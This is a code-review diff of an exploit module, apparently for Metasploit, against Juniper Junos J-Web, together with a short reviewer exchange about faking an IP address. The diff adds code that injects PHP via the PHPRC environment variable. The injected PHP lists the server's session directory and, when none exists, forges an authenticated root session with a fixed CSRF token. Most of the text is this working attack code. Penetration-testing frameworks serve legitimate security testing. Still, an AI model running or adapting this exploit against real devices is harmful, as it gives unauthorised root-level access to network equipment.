modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb

```diff
@@ -119,47 +125,110 @@ def send_php_exploit(phprc, file_contents)
+        'vars_get' => {
+          'PHPRC' => phprc
+        }
+      },
+      60 # setting the timeout to 60 seconds for old devices
     )
   end
 
   def get_php_session_id
-    get_var_sess = "<?php print_r(scandir('/var/sess'));?>"
+    get_var_sess = "<?php print_r(scandir('#{datastore['SESSION_DIRECTORY']}'));?>"
     res = send_php_exploit('/dev/fd/0', get_var_sess)
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-
+    
     php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]
 
-    fail_with(Failure::UnexpectedReply, "Failed to retrieve a PHP Session ID. There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id
-    print_status("Found PHPSESSID: #{php_session_id}.")
+    if php_session_id.nil?
+      print_status("No PHPSESSID found in #{datastore['SESSION_DIRECTORY']}. Trying to create a session.")
+      php_session_id = create_php_session
+    end
+    print_status("PHPSESSID: #{php_session_id}.")
     php_session_id
   end
 
-  def get_csrf_token(php_session_id)
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'diagnose'),
-      'method' => 'GET',
-      'headers' =>
-        {
-          'Cookie' => "PHPSESSID=#{php_session_id}"
-        },
-      'vars_get' => {
-        'm[]' => 'pinghost'
-      }
-    )
+  def create_php_session()
+    create_sess = "<?php
+require('main.inc.php');
+global $loginPage;
+global $enterlsysname;
+$loginPage = true;
+$enterlsysname = null;
+$user = new user(false);
+
+require_once('languages/' . $c['language'] . '/language.php');
+
+// Create session
+session_save_path('#{datastore['SESSION_DIRECTORY']}');
+session_start();
+$user->session->session_open = true;
+$user->set_language($c['language']);
+
+// Snag the hostname & model from the environment
+$user->set_var('device-hostname', $_SERVER['SERVER_NAME']);
+$user->set_var('device-model', $_SERVER['JNX_PRODUCT_MODEL']);
+$user->set_var(TEMPLATE_USERNAME, 'root');
+$user->set_var(USERNAME, 'root');
+$user->set_var(LSYSNAME, '');
+$user->set_var ('csrf_token', 'asdf');
+
+// Set up default variables for user
+$user->set_var(DEBUG_ASP, 'sp-0/0/0');
+$user->set_var(DEBUG_WIZARD_COMMIT, true);
+
+// Set up XNM username and logged user name
+//$user->xnm = new junoscript($this->get_var(TEMPLATE_USERNAME), $this->get_var(USERNAME));
+$user->xnm->set_user_name('root');
+$user->xnm->set_logged_user_name('root');
+
+// Call J-Web authentication RPC so MGD knows about this session
+$output = $user->xnm->query('request-web-management-login',
+    array(
+  'user' => 'root',
+  'session-id' => session_id(),
+  'from' => '192.168.0.1',
```

Comment:
Could we use Faker for this IP address if it doesn't need to be this exact value?
```suggestion
  'from' => "'#{Faker::Internet.ip_v4_address}'",
```

Reply:
sure